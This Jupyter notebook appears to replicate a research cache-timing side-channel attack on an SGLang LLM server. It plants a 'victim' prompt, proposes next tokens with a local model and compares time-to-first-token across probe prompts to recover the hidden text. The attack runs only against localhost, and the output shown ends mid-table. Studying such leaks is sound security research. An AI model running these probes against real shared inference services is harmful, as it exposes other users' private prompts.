In [9]:
import json
import time
import aiohttp
import asyncio
import random
from typing import Tuple, Dict, List, Any, Optional
from transformers import AutoModelForCausalLM, AutoTokenizer
import torch
from datasets import load_dataset
from itertools import islice

import aiohttp, json, time

import requests
import time
import requests
import json
import random
import string
from sglang.utils import print_highlight
import asyncio
import aiohttp
import numpy as np
from transformers import AutoTokenizer
from datasets import load_dataset
from collections import Counter
from tqdm import tqdm
import multiprocessing
import pandas as pd
from tqdm.asyncio import tqdm_asyncio

In [10]:
# Experiment configuration for the victim workload.
# NOTE(review): SGLANG_URL is not referenced by the cells visible here; SGLANG_SERVICE_URL
# (defined further down with the same value) is what gets passed to InferenceClient.
SGLANG_URL = "http://localhost:30000/generate"
# Hugging Face dataset id; handed to load_dataset() further down.
DATASET_NAME = "fka/awesome-chatgpt-prompts"
NUM_USERS = 1  # Single victim user as per paper's evaluation
REQUESTS_PER_USER = 40  # As mentioned in paper
REQUEST_FREQUENCY = 0.004  # requests per second (40 requests / 10800 s ≈ 0.0037, rounded to 0.004)

In [35]:

async def fetch_metrics_raw(session, prompt, request_id, URL):
    """Send one streaming chat-completion request and time its response.

    Args:
        session: Object exposing ``post(url, json=...)`` as an async context
            manager whose response has ``status`` and an async-iterable
            ``content`` of byte lines (an ``aiohttp.ClientSession`` in this
            notebook).
        prompt: User message placed in the single-turn ``messages`` list.
        request_id: Opaque identifier echoed back under ``"id"``.
        URL: Endpoint the request is POSTed to.

    Returns:
        On a non-200 status: ``{"id", "error", "status": "fail"}``.
        Otherwise a dict with ``id``, ``prompt``, ``ttft_ms`` (time to the
        first non-empty content chunk, 0 if none arrived), ``tpot_ms`` (mean
        time per chunk after the first, 0 with fewer than two chunks),
        ``tokens`` (number of non-empty content chunks), ``status`` and
        ``restext`` (the concatenated content).
    """
    payload = {
        "model": "default",
        "messages": [{"role": "user", "content": prompt}],
        "stream": True,
        "temperature": 0,
        "session_id": 0,
        "max_tokens": 10,
    }
    start_time = time.perf_counter()
    first_token_time = None
    token_count = 0
    ttft = 0
    restext = ""
    async with session.post(URL, json=payload) as response:
        if response.status != 200:
            return {"id": request_id, "error": f"HTTP {response.status}", "status": "fail"}
        async for line in response.content:
            decoded_line = line.decode('utf-8').strip()
            # Only SSE data events carry payloads; blank separators and other fields are skipped.
            if not decoded_line.startswith("data: "):
                continue
            json_str = decoded_line[6:]
            if json_str == "[DONE]":
                break
            try:
                obj = json.loads(json_str)
            except json.JSONDecodeError:
                # A malformed event must not abort the whole measurement.
                continue
            # Some chunks carry an empty "choices" list; indexing [0] on those
            # used to raise IndexError.
            choices = obj.get("choices") if isinstance(obj, dict) else None
            if not choices:
                continue
            delta = choices[0].get("delta") or {}
            token = delta.get("content") or ""
            if token:
                restext += token
                if first_token_time is None:
                    first_token_time = time.perf_counter()
                    ttft = first_token_time - start_time
                token_count += 1
        end_time = time.perf_counter()
        tpot = 0
        if token_count > 1 and first_token_time:
            # Average inter-chunk time, excluding the first chunk (that one is the TTFT).
            generation_time = end_time - first_token_time
            tpot = generation_time / (token_count - 1)
        return {
            "id": request_id,
            "prompt": prompt,
            "ttft_ms": ttft * 1000 if ttft else 0,
            "tpot_ms": tpot * 1000,
            "tokens": token_count,
            "status": "success",
            "restext": restext,
        }

async def main(attack_prompts, URL):
    """Fire all attack prompts concurrently and report per-request latency.

    Each prompt is sent through ``fetch_metrics_raw`` on one shared
    ``aiohttp.ClientSession``; a table of the results and a short summary are
    printed.

    Args:
        attack_prompts: Sequence of prompt strings; the index of each prompt
            becomes its request id.
        URL: Endpoint passed through to ``fetch_metrics_raw``.

    Returns:
        ``(best_request, successful_results)`` where ``best_request`` is the
        successful result with the smallest ``ttft_ms`` (``None`` when no
        request succeeded) and ``successful_results`` is the list of all
        results whose status is ``"success"``.
    """
    async with aiohttp.ClientSession() as session:
        print(f"⚡ Sending {len(attack_prompts)} requests to SGLang ({URL})...\n")
        tasks = [
            fetch_metrics_raw(session, prompt, i, URL)
            for i, prompt in enumerate(attack_prompts)
        ]
        results = await tqdm_asyncio.gather(*tasks, desc="Attacking")
        print(f"{'ID':<3} | {'TTFT (ms)':<10} | {'TPOT (ms)':<10} | {'Tokens':<6} | {'Prompt Snippet'}")
        print("-" * 70)
        successful_results = []
        for res in results:
            if res["status"] == "success":
                print(f"{res['id']:<3} | {res['ttft_ms']:<10.2f} | {res['tpot_ms']:<10.2f} | {res['tokens']:<6} | {res['prompt'][:30]} | {res.get('restext', '')[:30]}")
                successful_results.append(res)
            else:
                print(f"{res['id']:<3} | {'ERROR':<10} | {'-':<10} | {'-':<6} | {res['error']}")
        # Defined up front so the return below cannot hit an unbound name when
        # every request failed (or no prompts were given).
        best_request = None
        if successful_results:
            ttfts = [r['ttft_ms'] for r in successful_results]
            tpots = [r['tpot_ms'] for r in successful_results]
            best_request = min(successful_results, key=lambda x: x['ttft_ms'])

            print("\n--- Summary ---")
            print(f"Avg TTFT: {np.mean(ttfts):.2f} ms")
            print(f"Avg TPOT: {np.mean(tpots):.2f} ms")
            print("-" * 30)
            print(f"Min TTFT:        {best_request['ttft_ms']:.2f} ms")
            print(f"Min TTFT Prompt: \"{best_request['prompt']}\"")
        return best_request, successful_results

In [19]:
def chunk_list(data, chunk_size):
    """Lazily split ``data`` into consecutive lists of up to ``chunk_size`` items.

    The final list may be shorter than ``chunk_size``; nothing is yielded for
    an empty input.
    """
    source = iter(data)
    # Two-argument iter(): keep pulling slices until an empty list comes back.
    for batch in iter(lambda: list(islice(source, chunk_size)), []):
        yield batch
# --- Streaming TTFT helper (the configuration constants follow after stream_ttft) ---

async def stream_ttft(
    session: aiohttp.ClientSession,
    url: str,
    payload: dict,
):
    """POST ``payload`` to ``url`` and time the arrival of the first token.

    Returns a dict with keys ``status``, ``ttft`` and ``token``:
    ``HTTP_<code>`` for a non-200 reply, ``OK`` (with the elapsed seconds and
    the token text) as soon as a non-empty token is seen, and ``NO_TOKEN`` if
    the stream finishes without one.
    """

    def _outcome(status, ttft=None, token=None):
        # Every exit path reports the same three keys.
        return {
            "status": status,
            "ttft": ttft,
            "token": token,
        }

    def _token_from(text):
        # JSON payloads: a "text" field wins, otherwise an OpenAI-style delta.
        # Anything that is not JSON is taken verbatim as the token.
        try:
            parsed = json.loads(text)
            if "text" in parsed:
                return parsed["text"]
            if "choices" in parsed:
                return parsed["choices"][0].get("delta", {}).get("content", "")
            return ""
        except json.JSONDecodeError:
            return text

    began = time.perf_counter()

    async with session.post(url, json=payload) as resp:
        if resp.status != 200:
            return _outcome(f"HTTP_{resp.status}")

        async for chunk in resp.content:
            text = chunk.decode("utf-8", errors="ignore").strip()
            if not text:
                continue

            # Drop the SSE field name when present.
            if text.startswith("data:"):
                text = text[5:].strip()

            if text == "[DONE]":
                break

            piece = _token_from(text)
            if piece:
                elapsed = time.perf_counter() - began
                return _outcome("OK", elapsed, piece)

    return _outcome("NO_TOKEN")
# Endpoints of the local SGLang server. These are real network targets, not mocks:
# SGLANG_SERVICE_URL is handed to InferenceClient, which POSTs the victim request to it,
# and SGLANG_ATTACK_URL is passed to main() for the timing probes.
SGLANG_SERVICE_URL = "http://localhost:30000/generate"
SGLANG_ATTACK_URL="http://localhost:30000/v1/chat/completions"
# LOCAL_MODEL_PATH = "Qwen/Qwen2.5-1.5B-Instruct"
# Forwarded as token= to from_pretrained below; left empty here.
# NOTE(review): if a real token is ever needed, read it from the environment instead of committing it.
HF_TOKEN = ""
# LOCAL_MODEL_PATH="chaejin98330/Qwen2.5-0.5B-Finetuned"
# Relative path to the local draft model used to propose candidate next tokens.
LOCAL_MODEL_PATH="../../results/"
DATASET_NAME = "fka/awesome-chatgpt-prompts"

# Loaded once at module level; InferenceClient.predict_next_token_local_llm reads these globals.
tokenizer = AutoTokenizer.from_pretrained(LOCAL_MODEL_PATH,
    token=HF_TOKEN)
model = AutoModelForCausalLM.from_pretrained(LOCAL_MODEL_PATH,
    token=HF_TOKEN)
# ====================================================================
# MOCK DEPENDENCIES (For Simulation)
# ====================================================================

class KV_Simulator:
    """
    Local stand-in for a prefix cache.

    Holds a list of previously seen sequences and reports how many leading
    whitespace-separated words a query shares with the best-matching entry.
    """
    def __init__(self):
        self.cache: List[str] = []
        # Seed entries so that lookups can hit something out of the box.
        for seed in (
            "The quick brown fox jumps over the lazy dog",
            "What are the steps involved in running a multi-tenant LLM service",
            "The best way to start a day is by getting up early",
        ):
            self.add_to_cache(seed)

    def add_to_cache(self, sequence: str):
        """Store ``sequence`` unless an identical entry is already present."""
        if sequence in self.cache:
            return
        self.cache.append(sequence)

    def get_lpm_score(self, sequence: str) -> int:
        """
        Return the longest shared word prefix between ``sequence`` and any
        cached entry (case-insensitive, words split on whitespace).
        """
        query_words = sequence.lower().split()
        best = 0

        for entry in self.cache:
            shared = 0
            # zip stops at the shorter sequence, so no explicit bound is needed.
            for query_word, cached_word in zip(query_words, entry.lower().split()):
                if query_word != cached_word:
                    break
                shared += 1

            if shared > best:
                best = shared

        return best
def flush_cache(url: str = "http://localhost:30000/flush_cache", timeout: float = 30.0):
    """Ask the server to drop its cache so the next measurement starts cold.

    Args:
        url: Flush endpoint; defaults to the local server used in this notebook.
        timeout: Seconds to wait for the server before giving up.

    Raises:
        requests.HTTPError: if the server answers with an error status. A
            failed flush would otherwise go unnoticed and later timings would
            be taken against a warm cache.
        requests.RequestException: on connection problems or timeout.
    """
    response = requests.post(url, timeout=timeout)
    response.raise_for_status()
    return

# ====================================================================
# INFERENCE CLIENT (The Attacker)
# ====================================================================

class InferenceClient:
    """Client used in this notebook to warm the server cache and draft guesses.

    It does two things:
      * ``victim_simulation`` POSTs one or more prompts to ``self.url`` so the
        server processes them (playing the victim).
      * ``predict_next_token_local_llm`` asks the module-level ``model`` /
        ``tokenizer`` for the most likely next tokens after a prefix.
    """

    def __init__(self, url: str):
        """Remember the target endpoint and snapshot module-level settings."""
        self.url = url
        self.kv_simulator = KV_Simulator()
        self.LOCAL_MODEL_PATH = LOCAL_MODEL_PATH
        self.DATASET_NAME = DATASET_NAME

        # Static list of frequent tokens. Not read by any method of this
        # class; kept as a public attribute for existing callers.
        self.DRAFT_TOKENS = [" and", " the", " to", " is", " a", " of", " in", " that",
                             " for", " by", " with", " it", " as", " be", " an", " me", " you",
                             ".", ",", " what", " are", " steps", " to", " make", " best", " day"]

    # --- Component 1: local LLM proposing SINGLE-TOKEN candidates ---
    def predict_next_token_local_llm(self, current_prefix: str, num_candidates: int) -> List[str]:
        """Return the ``num_candidates`` most likely next tokens after ``current_prefix``.

        Runs one forward pass of the module-level ``model`` on the tokenized
        prefix and decodes the top-k entries of the last position's logits,
        highest first.

        Returns:
            Decoded candidate strings, or an empty list if the model call
            fails (the traceback is printed). Previously a failure returned
            ``None``, which broke callers that iterate over the result.
        """
        try:
            input_ids = tokenizer.encode(current_prefix, return_tensors="pt")
            with torch.no_grad():
                outputs = model(input_ids)
                next_token_logits = outputs.logits[:, -1, :]
                # Get top 'num_candidates' tokens
                top_k_indices = torch.topk(next_token_logits, num_candidates).indices.squeeze(0)

            return [tokenizer.decode(idx.item()) for idx in top_k_indices]
        except Exception as e:
            import traceback
            traceback.print_exc()
            print(f"Exception happened {e}, {current_prefix}")
            return []

    async def victim_simulation(self, input_sequences: List[str], max_tokens_to_recover: int, num_candidates: int = 10, track_kv: bool = False) -> List[Tuple[str, float]]:
        """Send every sequence to the server concurrently, as the victim would.

        Args:
            input_sequences: Prompts to submit. A single ``str`` is treated as
                one prompt rather than being iterated character by character.
            max_tokens_to_recover: Accepted for interface compatibility; unused.
            num_candidates: Accepted for interface compatibility; unused.
            track_kv: Forwarded to the request helper, which does not act on it.

        Returns:
            One ``(text, latency_seconds)`` tuple per input sequence, in input
            order. On failure ``text`` starts with ``"ERROR_"``.
        """
        if isinstance(input_sequences, str):
            input_sequences = [input_sequences]

        async with aiohttp.ClientSession() as session:
            tasks = [self._send_token_peek_request_victim(session, seq, track_kv) for seq in input_sequences]
            results = await asyncio.gather(*tasks)
        return results

    async def _send_token_peek_request_victim(self, session: aiohttp.ClientSession, full_sequence: str, track_kv: bool) -> Tuple[str, float]:
        """POST ``full_sequence`` to ``self.url`` and return ``(text, latency_seconds)``.

        The request reuses the caller's ``session`` instead of opening a new
        one per call. Every outcome returns a 2-tuple: the success path always
        did, and the error paths (``"ERROR_<status>"`` or
        ``"ERROR_<exception>"``) used to append a stray empty dict.

        ``track_kv`` is accepted but currently has no effect.
        """
        payload = {
            "model": "Qwen/Qwen2.5-1.5B-Instruct",
            "text": full_sequence,
            "max_new_tokens": 10,  # Generate some tokens to ensure caching
            "stream": False,
            "ignore_eos": True,  # If supported by your SGLang version,
            "session_id": 0,
            "temperature": 0,
        }

        # perf_counter is monotonic, so the interval cannot be skewed by
        # wall-clock adjustments; it is also what the other helpers here use.
        start_time = time.perf_counter()
        text_chunk_final = ""

        try:
            async with session.post(self.url, json=payload) as response:
                if response.status != 200:
                    return f"ERROR_{response.status}", time.perf_counter() - start_time

                async for raw_line in response.content:
                    line = raw_line.decode('utf-8').strip()
                    # Skip empty keep-alive lines
                    if not line:
                        continue

                    # SSE events are prefixed with "data:". With "stream": False the
                    # reply is expected to be a plain JSON document instead
                    # (NOTE(review): confirm against the deployed SGLang version),
                    # so un-prefixed lines are parsed too rather than ignored.
                    if line.startswith("data:"):
                        line = line[5:].strip()

                    if line == "[DONE]":
                        break

                    try:
                        chunk = json.loads(line)
                    except json.JSONDecodeError:
                        continue

                    if isinstance(chunk, dict):
                        text_chunk_final += chunk.get("text", "") or ""

                return text_chunk_final, time.perf_counter() - start_time

        except Exception as e:
            return f"ERROR_{str(e)}", time.perf_counter() - start_time

The module name  (originally ) is not a valid Python identifier. Please rename the original module to avoid import issues.


In [20]:
# Client that POSTs the victim request to the /generate endpoint.
client = InferenceClient(url=SGLANG_SERVICE_URL)


# Same value as the earlier assignments; repeated so this cell can be re-run on its own.
DATASET_NAME = "fka/awesome-chatgpt-prompts"

# Load ALL splits (this dataset has only "train")
dataset = load_dataset(DATASET_NAME)
# First record of the train split; its "prompt" field becomes the victim request.
item=dataset["train"][0]

In [45]:
# --- 1. VICTIM CACHE INJECTION (Simulating the victim running their request) ---
victim_request = item["prompt"]


# Flush the server cache, then submit the victim's full request so the server processes it
# (assumption: prefix caching is enabled server-side, so the prompt ends up cached — TODO confirm).
print(f"--- VICTIM CACHE INJECTION ---")
# client.kv_simulator.add_to_cache(victim_request)
flush_cache()
# for i in range(20):
# The same prompt is sent twice, concurrently. victim_simulation only forwards the sequences;
# it does not use max_tokens_to_recover or num_candidates, and no token recovery happens here.
recovered_request = await client.victim_simulation(
    input_sequences=[victim_request,victim_request], 
    max_tokens_to_recover=10, 
    num_candidates=15, 
    track_kv=True # accepted and passed along, but not acted on by the request helper
)
# Keep only the result of the first of the two requests.
recovered_request=recovered_request[0]

print(f"Victim's full request added to cache: '{victim_request}'")
# print(f"Victim's response request added to cache: '{recovered_request[0][:30]}'")
# NOTE(review): this is the size of the local KV_Simulator list, which this cell never updates
# (the add_to_cache call above is commented out); it says nothing about the server's cache.
print(f"Cache size: {len(client.kv_simulator.cache)} entries.\n")

--- VICTIM CACHE INJECTION ---
Victim's full request added to cache: 'Imagine you are an experienced Ethereum developer tasked with creating a smart contract for a blockchain messenger. The objective is to save messages on the blockchain, making them readable (public) to everyone, writable (private) only to the person who deployed the contract, and to count how many times the message was updated. Develop a Solidity smart contract for this purpose, including the necessary functions and considerations for achieving the specified goals. Please provide the code and any relevant explanations to ensure a clear understanding of the implementation.'
Cache size: 3 entries.



In [46]:
# Split the first sentence of the victim prompt into a known prefix (the first
# `split_index` words) and the word that follows it.
split_index = 3
first_sentence_words = victim_request.split(".")[0].split()
words_to_recover = len(victim_request.split())
known_prefix = " ".join(first_sentence_words[:split_index])
# Ground-truth continuation of known_prefix. The previous expression indexed
# word split_index+1 (skipping one word) and then joined that word's characters
# with spaces; an empty string is used when the sentence is too short.
next_token = first_sentence_words[split_index] if len(first_sentence_words) > split_index else ""
# Ask the local draft model for the 10 most likely next tokens after the prefix.
candidates = client.predict_next_token_local_llm(known_prefix, 10)
print(known_prefix)
print(candidates)
# One probe prompt per candidate; the candidates carry their own leading whitespace.
attackprompts = [known_prefix + candidate for candidate in candidates]

Imagine you are
[' a', ' an', ' working', ' the', ' playing', ' designing', ' tasked', ' planning', ' developing', ' organizing']


In [47]:
# Probe all candidate prompts concurrently against the chat-completions endpoint.
# `best` is the successful result with the lowest TTFT; `success` lists every successful result.
best,success=await main(attackprompts, SGLANG_ATTACK_URL)

⚡ Sending 10 requests to SGLang (http://localhost:30000/v1/chat/completions)...



Attacking: 100%|██████████| 10/10 [00:00<00:00, 81.86it/s]

ID  | TTFT (ms)  | TPOT (ms)  | Tokens | Prompt Snippet
----------------------------------------------------------------------
0   | 79.61      | 4.46       | 10     | Imagine you are a | <think>
Okay, the user wants m
1   | 76.58      | 4.73       | 10     | Imagine you are an | <think>
Okay, the user wants m
2   | 79.38      | 4.45       | 10     | Imagine you are working | <think>
Okay, the user wants m
3   | 79.99      | 4.47       | 10     | Imagine you are the | <think>
Okay, the user wants m
4   | 79.32      | 4.45       | 10     | Imagine you are playing | <think>
Okay, the user wants m
5   | 79.88      | 4.47       | 10     | Imagine you are designing | <think>
Okay, the user wants m
6   | 79.48      | 4.46       | 10     | Imagine you are tasked | <think>
Okay, the user wants m
7   | 80.15      | 4.46       | 10     | Imagine you are planning | <think>
Okay, the user wants m
8   | 79.12      | 4.42       | 10     | Imagine you are developing | <think>
Okay, the user wants m
9


